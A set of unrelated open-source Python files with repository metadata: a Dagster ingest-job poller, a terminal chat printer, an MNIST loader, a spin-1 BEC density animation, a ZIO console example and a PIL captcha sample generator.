mapping = pd.read_csv(mapping_name, index_col=0)
d = mapping[mapping.index == "Robbins"]
v, k = d.columns.values, d.values[0]
robbins = robbins[k]
robbins.rename(columns=dict(zip(k, v)), inplace=True)
if output_filename is not None:
robbins.to_hdf(output_filename, "/Robbins",
append=os.path.exists(output_filename), index=False)
| 36.8 | 84 | 0.610637 | 308 | 2,576 | 4.961039 | 0.311688 | 0.082461 | 0.02356 | 0.032723 | 0.429319 | 0.429319 | 0.387435 | 0.387435 | 0.312827 | 0.312827 | 0 | 0.005933 | 0.28028 | 2,576 | 69 | 85 | 37.333333 | 0.818231 | 0.072593 | 0 | 0.222222 | 0 | 0 | 0.081195 | 0.024401 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.074074 | 0 | 0.111111 | 0.018519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d9175c1d53f0050bb3c406ad6da397071f06e203 | 3,558 | py | Python | orchestration/hca_orchestration/solids/load_hca/poll_ingest_job.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 5 | 2020-05-07T14:18:53.000Z | 2021-03-31T21:30:37.000Z | orchestration/hca_orchestration/solids/load_hca/poll_ingest_job.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 232 | 2020-05-28T16:47:22.000Z | 2022-03-08T21:08:42.000Z | orchestration/hca_orchestration/solids/load_hca/poll_ingest_job.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 1 | 2020-08-19T16:33:54.000Z | 2020-08-19T16:33:54.000Z | from typing import Optional
from dagster import solid, Int, Failure, Nothing, configured, String, DagsterLogManager
from dagster.core.execution.context.compute import AbstractComputeExecutionContext
from dagster_utils.typing import DagsterConfigDict
from data_repo_client import JobModel, ApiException, RepositoryApi
from hca_manage.common import JobId
from hca_orchestration.contrib.retry import is_truthy, retry
class DataFileIngestionFailure(Failure):
pass
@solid(
required_resource_keys={"data_repo_client"},
config_schema={
'max_wait_time_seconds': Int,
'poll_interval_seconds': Int,
}
)
def base_check_data_ingest_job_result(context: AbstractComputeExecutionContext, job_id: JobId) -> JobId:
job_results = _base_check_jade_job_result(
context.solid_config['max_wait_time_seconds'],
context.solid_config['poll_interval_seconds'],
job_id,
context.resources.data_repo_client,
context.log
)
if job_results['failedFiles'] > 0:
raise DataFileIngestionFailure(
f"Bulk file load (job_id = {job_id} had failedFiles = {job_results['failedFiles']})")
return job_id
@configured(base_check_data_ingest_job_result)
def check_data_ingest_job_result(config: DagsterConfigDict) -> DagsterConfigDict:
"""
Polls the bulk file ingest results
Any files failed will fail the pipeline
"""
return {
'max_wait_time_seconds': 28800, # 8 hours
'poll_interval_seconds': 5
}
@solid(
required_resource_keys={"data_repo_client"},
config_schema={
'max_wait_time_seconds': Int,
'poll_interval_seconds': Int,
}
)
def check_table_ingest_result(context: AbstractComputeExecutionContext, job_id: JobId) -> JobId:
job_results = _base_check_jade_job_result(
context.solid_config['max_wait_time_seconds'],
context.solid_config['poll_interval_seconds'],
job_id,
context.resources.data_repo_client,
context.log
)
if job_results['bad_row_count'] == '0':
raise Failure(f"Bulk file load (job_id = {job_id} had failedFiles = {job_results['failedFiles']})")
return job_id
@configured(check_table_ingest_result)
def check_table_ingest_job_result(config: DagsterConfigDict) -> DagsterConfigDict:
"""
Polls the bulk file ingest results
Any files failed will fail the pipeline
"""
return {
'max_wait_time_seconds': 600, # 10 minutes
'poll_interval_seconds': 5,
}
def _base_check_jade_job_result(
max_wait_time_seconds: int,
poll_interval_seconds: int,
job_id: JobId,
data_repo_client: RepositoryApi,
logger: DagsterLogManager
) -> Nothing:
# we need to poll on the endpoint as a workaround for a race condition in TDR (DR-1791)
def __fetch_job_results(jid: JobId) -> Optional[JobModel]:
try:
logger.info(f"Fetching job results for job_id = {jid}")
return data_repo_client.retrieve_job_result(jid)
except ApiException as ae:
if 500 <= ae.status <= 599:
logger.info(f"Data repo returned error when fetching results for job_id = {jid}, scheduling retry")
return None
raise
job_results = retry(
__fetch_job_results,
max_wait_time_seconds,
poll_interval_seconds,
is_truthy,
job_id
)
if not job_results:
raise Failure(f"No job results after polling bulk ingest, job_id = {job_id}")
return job_results
| 31.767857 | 115 | 0.697021 | 437 | 3,558 | 5.343249 | 0.283753 | 0.034261 | 0.037687 | 0.06167 | 0.529336 | 0.500642 | 0.479229 | 0.479229 | 0.479229 | 0.460814 | 0 | 0.009045 | 0.223159 | 3,558 | 111 | 116 | 32.054054 | 0.835745 | 0.071669 | 0 | 0.309524 | 0 | 0 | 0.199877 | 0.095034 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0.011905 | 0.083333 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d918edc1790e02527055eb43540fcf3985679871 | 10,533 | py | Python | print_chat.py | IVIGOR13/print_chat | 629bc9419f13d05e13e0224000bf8bf12058e605 | [
"MIT"
] | 1 | 2020-04-07T07:44:37.000Z | 2020-04-07T07:44:37.000Z | print_chat.py | IVIGOR13/print_chat | 629bc9419f13d05e13e0224000bf8bf12058e605 | [
"MIT"
] | null | null | null | print_chat.py | IVIGOR13/print_chat | 629bc9419f13d05e13e0224000bf8bf12058e605 | [
"MIT"
] | null | null | null | #
# Author: Igor Ivanov
# 2019
#
import time
import os
from termcolor import colored
from datetime import datetime
import colorama
colorama.init()
"""
Small print tool for implementing chat in the terminal
"""
class print_chat:
def _clear_screen(self):
os.system('cls' if os.name == 'nt' else 'clear')
def clear_row(self):
print('\r' + ' ' * os.get_terminal_size().columns + '\r', end='')
def up_on_rows(self, number):
self.clear_row
print(('\x1b[A\r' + ' ' * os.get_terminal_size().columns + '\r') * number, end='')
def up_on_message(self, number):
n = self.__get_lines(number)
self.up_on_rows(n)
def up_on_occupied_rows(self, len_str):
lines = ((len_str-1) // os.get_terminal_size().columns) + 1
self.up_on_rows(lines)
def down_on_rows(self, number):
self.clear_row()
print(('\n\r' + ' ' * os.get_terminal_size().columns + '\r') * number, end='')
def get_num_messages(self):
return(len(self.MESSAGES))
def get_messages_from(self, sender):
out = ()
for i in self.MESSAGES:
if i['sender'] == sender:
out.append(i)
return out
def get_messages(self):
return self.MESSAGES
def get_message(self, number):
if number <= len(self.MESSAGES):
return self.MESSAGES[len(self.MESSAGES) - number]
def get_senders(self):
out = ()
for key in self.senders.keys():
out.append(key)
return out
def get_mark(self, number):
return self.MESSAGES[len(self.MESSAGES) - number]['mark']
def set_colors(self, colors):
found = False
for color in colors:
for i in range(len(self.senders)):
if self.senders[i]['sender'] == color[0]:
self.senders[i]['color'] = color[1]
found = True
if not found:
if len(color) == 1:
self.senders.append({
'sender': color[0],
'color': 'grey',
})
else:
self.senders.append({
'sender': color[0],
'color': color[1],
})
def get_time(self):
if not self.time_full:
return datetime.today().strftime("%H:%M")
else:
return datetime.today().strftime("%d.%m.%y %H:%M")
def set_header(self, text):
self.header = text.split('\n')
self._print_header()
def _print_header(self):
self._clear_screen()
for i in self.header:
print(i)
# returns the number of lines that must be passed to move the cursor to the specified message
def __get_lines(self, number):
lines = 0
for i in range(number):
# counting the number of lines occupied by a message
m = self.MESSAGES[(len(self.MESSAGES)-1) - i]
l = (len(m['sender']) + len(m['text']) + len(m['mark']) + self.len_frame)
# count the number of lines occupied by a skip
s = 0
for j in m['skip']:
j = str(j)
if isinstance(j, str):
for k in j.split('\n'):
s += ((len(k)-1) // os.get_terminal_size().columns) + 1
else:
s += ((len(j)-1) // os.get_terminal_size().columns) + 1
lines += (((l-1) // os.get_terminal_size().columns) + 1) + s
return lines
def _print_mess(self, sender, text, time, skip, mark):
if self.is_time:
print('[{}] '.format(time), end='')
# color selection for printing sender name
c0, c1 = 'white', 'grey'
found = False
for i in self.senders:
if i['sender'] == sender:
c = i['color']
if c == 'grey':
c0, c1 = 'white', 'grey'
else:
c0, c1 = 'grey', c
break
found = True
if not found:
self.senders.append({
'sender': sender,
'color': 'grey',
})
print(colored('[' + sender + ']', c0, ('on_' + c1)) + ': ', end='')
print('{}{}'.format(text, ''.join(mark)), end='\n')
for i in skip:
print(i)
def add_mark(self, number, mark):
if not mark == '' and number > 0 and number <= len(self.MESSAGES):
self.up_on_message(number)
m = self.MESSAGES[len(self.MESSAGES)-number]['mark']
if not m:
self.MESSAGES[len(self.MESSAGES)-number].update({
'mark': [str(mark)]
})
else:
m.append(str(mark))
self.MESSAGES[len(self.MESSAGES)-number].update({
'mark': m
})
self._load(number)
def edit_mark(self, number, mark):
if number > 0 and number <= len(self.MESSAGES):
if mark == '':
self.remove_mark(number)
else:
n = len(self.MESSAGES) - number
self.up_on_message(number)
self.MESSAGES[n].update({
'mark': [str(mark)]
})
self._load(number)
def remove_mark(self, number):
if number > 0 and number <= len(self.MESSAGES):
n = len(self.MESSAGES) - number
self.up_on_message(number)
self.MESSAGES[n].update({
'mark': []
})
self._load(number)
def has_mark(self, number):
n = len(self.MESSAGES) - number
if self.MESSAGES[n]['mark'] == []:
return False
else:
return True
def get_mark(self, number):
n = len(self.MESSAGES) - number
return self.MESSAGES[n]['mark']
def add_skip(self, number, text):
if not text == '' and number > 0 and number <= len(self.MESSAGES):
self.up_on_message(number)
m = self.MESSAGES[len(self.MESSAGES)-number]['skip']
if not m:
self.MESSAGES[len(self.MESSAGES)-number].update({
'skip': [str(text)]
})
else:
m.append(str(text))
self.MESSAGES[len(self.MESSAGES)-number].update({
'skip': m
})
self._load(number)
def edit_skip(self, number, text):
if number > 0 and number <= len(self.MESSAGES):
if text == '':
self.remove_skip(number)
else:
self.up_on_message(number)
self.MESSAGES[len(self.MESSAGES) - number].update({
'skip': [str(text)]
})
self._load(number)
def remove_skip(self, number):
if number > 0 and number <= len(self.MESSAGES):
self.up_on_message(number)
self.MESSAGES[len(self.MESSAGES) - number].update({
'skip': []
})
self._load(number)
def has_skip(self, number):
if self.MESSAGES[len(self.MESSAGES) - number]['skip'] == []:
return False
else:
return True
# reprints the specified number of messages
def reload(self, number):
if number > 0 and number < len(self.MESSAGES):
self.up_on_message(number)
self._load(number)
elif number == len(self.MESSAGES):
self._clear_screen()
self._print_header()
self._load(number)
def _load(self, number):
if number > 0 and number <= len(self.MESSAGES):
for m in self.MESSAGES[len(self.MESSAGES)-number:len(self.MESSAGES)]:
self._print_mess(m['sender'], m['text'], m['time'], m['skip'], m['mark'])
def remove(self, number):
if number > 0 and number <= len(self.MESSAGES):
self.up_on_message(number)
self._load(number-1)
self.MESSAGES.pop(len(self.MESSAGES) - number)
def edit(self, number, text):
if number > 0 and number <= len(self.MESSAGES):
if text == '':
self.remove(number)
else:
n = len(self.MESSAGES) - number
self.up_on_message(number)
self.MESSAGES[n].update({
'text': text
})
self._load(number)
def add_message_top(self, sender, text, time='', skip=[], mark=[], prnt=True):
text = " ".join(str(text).split())
if text != '':
if time == '':
time = self.get_time()
self.MESSAGES.insert(0, {
'sender': sender,
'text': text,
'time': time,
'skip': skip,
'mark': mark,
})
if prnt:
self.up_on_message(self.get_num_messages() - 1)
self._print_mess(sender, text, time, skip, mark)
self._load(self.get_num_messages()-1)
def add_message(self, sender, text, time='', skip=[], mark=[]):
text = " ".join(str(text).split())
if text != '':
if time == '':
time = self.get_time()
self.MESSAGES.append({
'sender': sender,
'text': text,
'time': time,
'skip': skip,
'mark': mark,
})
self._print_mess(sender, text, time, skip, mark)
def close(self, clr=False):
self.MESSAGES.clear()
self.senders.clear()
print('\x1b[A\r', end='')
if clr:
self._clear_screen()
def __init__(self, time=False):
self.MESSAGES = []
self.senders = []
self.header = []
self.is_time = False
self.time_full = False
if time == 'short':
self.len_frame = 4 + 8
self.is_time = True
elif time == 'full':
self.len_frame = 4 + 8 + 9
self.is_time = True
self.time_full = True
else:
self.len_frame = 4
self._clear_screen()
| 28.390836 | 97 | 0.475648 | 1,179 | 10,533 | 4.128923 | 0.114504 | 0.142975 | 0.101684 | 0.07765 | 0.542317 | 0.455218 | 0.417625 | 0.33977 | 0.278554 | 0.271364 | 0 | 0.007979 | 0.393145 | 10,533 | 370 | 98 | 28.467568 | 0.753598 | 0.028007 | 0 | 0.488806 | 0 | 0 | 0.032658 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130597 | false | 0 | 0.018657 | 0.011194 | 0.201493 | 0.063433 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d919543d1b1062c7801bafa6f3961d97bf6f7fb6 | 850 | py | Python | src/settings.py | doksketch/happy-dating | 680c63f38fe039b6567f5fce94c3d0fa3b968019 | [
"MIT"
] | null | null | null | src/settings.py | doksketch/happy-dating | 680c63f38fe039b6567f5fce94c3d0fa3b968019 | [
"MIT"
] | null | null | null | src/settings.py | doksketch/happy-dating | 680c63f38fe039b6567f5fce94c3d0fa3b968019 | [
"MIT"
] | null | null | null | logreg_params = dict(multi_class='ovr',
class_weight=None,
random_state=43,
max_iter=300,
n_jobs=-1,
penalty='l2',
C=0.5)
rnn_params = dict(
# Пути к данным
df="../coleridgeinitiative-show-us-the-data/train_splitted.csv",
vectorizer_file="vectorizer.json",
model_state_file="model.pth",
save_dir="../models",
# Гиперпараметры архитектуры нейросети
char_embedding_size=64,
rnn_hidden_size=16,
# Гиперпараметры тренировки нейросети
num_epochs=300,
learning_rate=1e-2,
batch_size=32,
seed=1337,
early_stopping_criteria=5,
# Runtime hyper parameter
cuda=True,
catch_keyboard_interrupt=True,
reload_from_files=False,
expand_filepaths_to_save_dir=True
) | 29.310345 | 68 | 0.615294 | 99 | 850 | 4.989899 | 0.818182 | 0.040486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041391 | 0.289412 | 850 | 29 | 69 | 29.310345 | 0.77649 | 0.129412 | 0 | 0 | 0 | 0 | 0.130435 | 0.078804 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d91a437d3329267d3f78bc766ee6ddef015b51b1 | 1,741 | py | Python | examples/zio_console_example.py | miiohio/ziopy | c216bfb834f08bce0419a906b9bf174697d06023 | [
"MIT"
] | 28 | 2021-03-03T16:29:36.000Z | 2022-03-31T05:05:59.000Z | examples/zio_console_example.py | miiohio/ziopy | c216bfb834f08bce0419a906b9bf174697d06023 | [
"MIT"
] | 1 | 2019-10-08T20:09:47.000Z | 2019-10-08T20:09:47.000Z | examples/zio_console_example.py | harveywi/ziopy | c216bfb834f08bce0419a906b9bf174697d06023 | [
"MIT"
] | 1 | 2022-01-28T15:37:43.000Z | 2022-01-28T15:37:43.000Z | from typing import NoReturn, Union
import ziopy.services.console as console
import ziopy.services.system as system
from ziopy.environments import ConsoleSystemEnvironment
from ziopy.services.console import Console, LiveConsole
from ziopy.zio import ZIO, ZIOMonad, monadic, unsafe_run, Environment
@monadic
def program(
do: ZIOMonad[Console, Union[EOFError, KeyboardInterrupt]]
) -> ZIO[
Console,
Union[EOFError, KeyboardInterrupt],
str
]:
con = do << Environment()
do << con.print("Hello, what is your name?")
name = do << con.input()
do << con.print(f"Your name is: {name}")
x = do << ZIO.succeed(1)
while x < 20:
x = do << (
ZIO.succeed(x)
.map(lambda p: p + 1)
.flat_map(lambda q: ZIO.succeed(q - 1))
.flat_map(lambda r: ZIO.succeed(r + 1))
)
do << con.print(f"The value of x is: {x}")
return ZIO.succeed(f"Hello, {name}!")
p = program().provide(LiveConsole())
final_result = unsafe_run(p)
print(f"Final result (1) is: {final_result}")
# You can run the same program (value) over and over again.
final_result_2 = unsafe_run(p)
print(f"Final result (2) is: {final_result_2}")
@monadic
def prog(
do: ZIOMonad[ConsoleSystemEnvironment, NoReturn]
) -> ZIO[ConsoleSystemEnvironment, NoReturn, int]:
age = do << console.get_input_from_console(
prompt="How old are you?\n",
parse_value=ZIO.from_callable(str).map(int).catch(ValueError).either().to_callable(),
default_value=21
)
do << console.print(f"You are {age} years old.")
return ZIO.succeed(age)
unsafe_run(
prog().provide(
ConsoleSystemEnvironment(console=LiveConsole(), system=system.LiveSystem())
)
)
| 27.203125 | 93 | 0.658817 | 233 | 1,741 | 4.841202 | 0.334764 | 0.053191 | 0.026596 | 0.065603 | 0.047872 | 0.047872 | 0.047872 | 0 | 0 | 0 | 0 | 0.008715 | 0.209075 | 1,741 | 63 | 94 | 27.634921 | 0.810458 | 0.03274 | 0 | 0.040816 | 0 | 0 | 0.115933 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.122449 | 0 | 0.204082 | 0.122449 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d91ba473ca0e37b17defe052cdc5b0b0991183c2 | 1,872 | py | Python | examples/Classify/MNistLoader.py | parrisma/TicTacToe-DeepLearning | 4fefb1ef9d172eb19709f0f2a681307537769f58 | [
"MIT"
] | 1 | 2021-08-17T12:09:48.000Z | 2021-08-17T12:09:48.000Z | examples/Classify/MNistLoader.py | parrisma/TicTacToe-DeepLearning | 4fefb1ef9d172eb19709f0f2a681307537769f58 | [
"MIT"
] | null | null | null | examples/Classify/MNistLoader.py | parrisma/TicTacToe-DeepLearning | 4fefb1ef9d172eb19709f0f2a681307537769f58 | [
"MIT"
] | null | null | null | import os
import struct
import unittest
import numpy as np
#
# based on https://gist.github.com/akesling/5358964
# Which contains comment.
# > Loosely inspired by http://abel.ee.ucla.edu/cvxopt/_downloads/mnist.py
# > which is GPL licensed.
#
class MNistLoader:
@classmethod
def read_mnist(cls,
training=True,
path="."):
if training:
fname_img = os.path.join(path, 'train-images.idx3-ubyte')
fname_lbl = os.path.join(path, 'train-labels.idx1-ubyte')
else:
fname_img = os.path.join(path, 't10k-images.idx3-ubyte')
fname_lbl = os.path.join(path, 't10k-labels.idx1-ubyte')
# Load everything in some numpy arrays
with open(fname_lbl, 'rb') as flbl:
_, _ = struct.unpack(">II", flbl.read(8))
lbl = np.fromfile(flbl, dtype=np.int8)
with open(fname_img, 'rb') as fimg:
magic, num, rows, cols = struct.unpack(">IIII", fimg.read(16))
img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)
return img, lbl
#
# Unit Tests.
#
class TestMNISTLoader(unittest.TestCase):
#
# Test Image Load.
#
def test_0(self):
ml = MNistLoader()
img, lbl = ml.read_mnist(training=True,
path="C:\\Users\\Admin_2\\Google Drive\\DataSets")
s = np.shape(img)
self.assertEqual(len(s), 3)
self.assertEqual(s[0], 60000)
self.assertEqual(s[1], 28)
self.assertEqual(s[2], 28)
s = np.shape(lbl)
self.assertEqual(len(s), 1)
self.assertEqual(s[0], 60000)
return
#
# Execute the UnitTests.
#
if __name__ == "__main__":
tests = TestMNISTLoader()
suite = unittest.TestLoader().loadTestsFromModule(tests)
unittest.TextTestRunner().run(suite)
| 25.643836 | 83 | 0.587073 | 234 | 1,872 | 4.606838 | 0.487179 | 0.083488 | 0.037106 | 0.051948 | 0.166976 | 0.109462 | 0.068646 | 0.068646 | 0.068646 | 0 | 0 | 0.031088 | 0.278312 | 1,872 | 72 | 84 | 26 | 0.766839 | 0.142094 | 0 | 0.05 | 0 | 0 | 0.096287 | 0.073002 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.05 | false | 0 | 0.1 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d91e5b227907a31856a0adc939b8a34e7e1a5f00 | 3,321 | py | Python | diagnostics/plots/dipole_vids.py | wheelerMT/spin-1_BEC | e8ea34699b4001847c6b4c7451c11be241ce598f | [
"MIT"
] | null | null | null | diagnostics/plots/dipole_vids.py | wheelerMT/spin-1_BEC | e8ea34699b4001847c6b4c7451c11be241ce598f | [
"MIT"
] | null | null | null | diagnostics/plots/dipole_vids.py | wheelerMT/spin-1_BEC | e8ea34699b4001847c6b4c7451c11be241ce598f | [
"MIT"
] | null | null | null | import h5py
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
# Load in data:
filename = input('Enter data filename: ')
data_file = h5py.File('../../data/{}.hdf5'.format(filename), 'r')
psi_plus = data_file['wavefunction/psi_plus']
psi_0 = data_file['wavefunction/psi_0']
psi_minus = data_file['wavefunction/psi_minus']
# Other variables:
x, y = data_file['grid/x'], data_file['grid/y']
dx, dy = x[1] - x[0], y[1] - y[0]
X, Y = np.meshgrid(x[:], y[:])
# Loading time variables:
Nt, dt, Nframe = np.array(data_file['time/Nt']), np.array(data_file['time/dt']), np.array(data_file['time/Nframe'])
num_of_frames = psi_plus.shape[-1]
# Calculate initial spin expectation:
dens = abs(psi_plus[:, :, 0]) ** 2 + abs(psi_0[:, :, 0]) ** 2 + abs(psi_minus[:, :, 0]) ** 2
F_perp = np.sqrt(2) * (np.conj(psi_plus[:, :, 0]) * psi_0[:, :, 0] + np.conj(psi_0[:, :, 0]) * psi_minus[:, :, 0])
Fz = abs(psi_plus[:, :, 0]) ** 2 - abs(psi_minus[:, :, 0]) ** 2
spin_expec_mag = np.sqrt(Fz ** 2 + abs(F_perp) ** 2) / dens
# Set up figure:
fig, ax = plt.subplots(1, 3, sharey=True, figsize=(10, 10))
ax[0].set_ylabel(r'$y / \xi_s$')
ax[0].set_title(r'$|\psi_+|^2$')
ax[1].set_title(r'$|\psi_-|^2$')
ax[2].set_title(r'$|<\vec{F}>|$')
for axis in ax:
axis.set_xlabel(r'$x / \xi_s$')
cvals_dens = np.linspace(0, 1, 25, endpoint=True)
cvals_spin = np.linspace(0, 1, 25, endpoint=True)
# Initial frame plot:
densPlus_plot = ax[0].contourf(X, Y, abs(psi_plus[:, :, 0]) ** 2, cvals_dens, cmap='gnuplot')
densMinus_plot = ax[1].contourf(X, Y, abs(psi_minus[:, :, 0]) ** 2, cvals_dens, cmap='gnuplot')
spin_plot = ax[2].contourf(X, Y, spin_expec_mag, cvals_spin, cmap='PuRd')
cont = [densPlus_plot, densMinus_plot, spin_plot]
# Set up color bars:
dens_cbar = plt.colorbar(densMinus_plot, ax=ax[1], fraction=0.044, pad=0.03)
phase_cbar = plt.colorbar(spin_plot, ax=ax[2], ticks=[0, 1], fraction=0.044, pad=0.03)
for axis in ax:
axis.set_aspect('equal')
plt.text(-100, 400, r'$n_0 = 1, c_0 = 3.5, c_2 = 0.5$')
def animate(i):
"""Animation function for plots."""
global cont
for contour in cont:
for c in contour.collections:
c.remove()
ax[0].contourf(X, Y, abs(psi_plus[:, :, i]) ** 2, cvals_dens, cmap='gnuplot')
ax[1].contourf(X, Y, abs(psi_minus[:, :, i]) ** 2, cvals_dens, cmap='gnuplot')
# Calculate spin expectation:
dens = abs(psi_plus[:, :, i]) ** 2 + abs(psi_0[:, :, i]) ** 2 + abs(psi_minus[:, :, i]) ** 2
F_perp = np.sqrt(2) * (np.conj(psi_plus[:, :, i]) * psi_0[:, :, i] + np.conj(psi_0[:, :, i]) * psi_minus[:, :, i])
Fz = abs(psi_plus[:, :, i]) ** 2 - abs(psi_minus[:, :, i]) ** 2
spin_expec_mag = np.sqrt(Fz ** 2 + abs(F_perp) ** 2) / dens
ax[2].contourf(X, Y, spin_expec_mag, cvals_spin, cmap='PuRd')
cont = [ax[0], ax[1], ax[2]]
print('On density iteration %i' % (i + 1))
plt.suptitle(r'$\tau$ = %2f' % (Nframe * dt * i), y=0.7)
return cont
# Calls the animation function and saves the result
anim = animation.FuncAnimation(fig, animate, frames=num_of_frames, repeat=False)
anim.save('../../../plots/spin-1/{}.mp4'.format(filename[7:]), dpi=200,
writer=animation.FFMpegWriter(fps=60, codec="libx264", extra_args=['-pix_fmt', 'yuv420p']))
print('Density video saved successfully.')
| 39.070588 | 118 | 0.620897 | 563 | 3,321 | 3.507993 | 0.269982 | 0.042532 | 0.03038 | 0.024304 | 0.384304 | 0.355443 | 0.258228 | 0.155949 | 0.108354 | 0.108354 | 0 | 0.045016 | 0.157182 | 3,321 | 84 | 119 | 39.535714 | 0.660593 | 0.076182 | 0 | 0.071429 | 0 | 0 | 0.126719 | 0.023248 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017857 | false | 0 | 0.071429 | 0 | 0.107143 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d924de18914aff5fa9f08bc65617db228d203fc4 | 2,296 | py | Python | gen_sample_by_PIL.py | chldong/cnn_captcha | 3c528ac30b6278bc55f04ac0dd565985ef4d5f52 | [
"Apache-2.0"
] | null | null | null | gen_sample_by_PIL.py | chldong/cnn_captcha | 3c528ac30b6278bc55f04ac0dd565985ef4d5f52 | [
"Apache-2.0"
] | null | null | null | gen_sample_by_PIL.py | chldong/cnn_captcha | 3c528ac30b6278bc55f04ac0dd565985ef4d5f52 | [
"Apache-2.0"
] | null | null | null | # -*- coding: UTF-8 -*-
"""
使用PIL lib生成验证码(前提:pip install PIL)
"""
from PIL import Image,ImageFont,ImageDraw,ImageFilter
import os
import random
import time
import json
def gen_special_img(text, file_path, width, height):
# 生成img文件
fontSize = 16
backGroundColor = (102,142,107)
fontColor = (112,66,60)
font = ImageFont.truetype('./simhei.ttf', fontSize)
img = Image.new('RGBA',(width,height), backGroundColor)
textWidth, textHeight = font.getsize(text)
textLeft = (width-textWidth)/2
textTop = (height-textHeight)/2-2
draw = ImageDraw.Draw(img)
draw.text(xy=(textLeft,textTop),text=text,fill=fontColor,font=font)
rot = img.rotate(0,expand=0)
img.rotate
fff = Image.new('RGBA', rot.size,backGroundColor)
img = Image.composite(rot, fff, rot)
img.save(file_path) # 保存图片
def gen_ima_by_batch(root_dir, image_suffix, characters, count, char_count, width, height):
# 判断文件夹是否存在
if not os.path.exists(root_dir):
os.makedirs(root_dir)
# for index, i in enumerate(range(count)):
# text = ""
# for j in range(char_count):
# text += random.choice(characters)
for index, i in enumerate(range(count)):
text = ""
add_al = chr(random.randrange(65, 91)) # chr转换为A-Z大写。print(chr(90))#65-90任意生成A-Z
for j in range(char_count):
text += random.choice(characters)
text = "".join([str(add_al),text])
timec = str(time.time()).replace(".", "")
p = os.path.join(root_dir, "{}_{}.{}".format(text, timec, image_suffix))
gen_special_img(text, p, width, height)
print("Generate captcha image => {}".format(index + 1))
def main():
with open("conf/captcha_config.json", "r") as f:
config = json.load(f)
# 配置参数
root_dir = config["root_dir"] # 图片储存路径
image_suffix = config["image_suffix"] # 图片储存后缀
characters = config["characters"] # 图片上显示的字符集 # characters = "0123456789abcdefghijklmnopqrstuvwxyz"
count = config["count"] # 生成多少张样本
char_count = config["char_count"] # 图片上的字符数量
# 设置图片高度和宽度
width = config["width"]
height = config["height"]
gen_ima_by_batch(root_dir, image_suffix, characters, count, char_count, width, height)
if __name__ == '__main__':
main()
| 30.210526 | 104 | 0.642857 | 295 | 2,296 | 4.861017 | 0.420339 | 0.03417 | 0.018131 | 0.02371 | 0.203626 | 0.203626 | 0.203626 | 0.203626 | 0.156206 | 0.156206 | 0 | 0.024876 | 0.212108 | 2,296 | 75 | 105 | 30.613333 | 0.767828 | 0.155488 | 0 | 0 | 0 | 0 | 0.07628 | 0.012539 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0 | 0.106383 | 0 | 0.170213 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |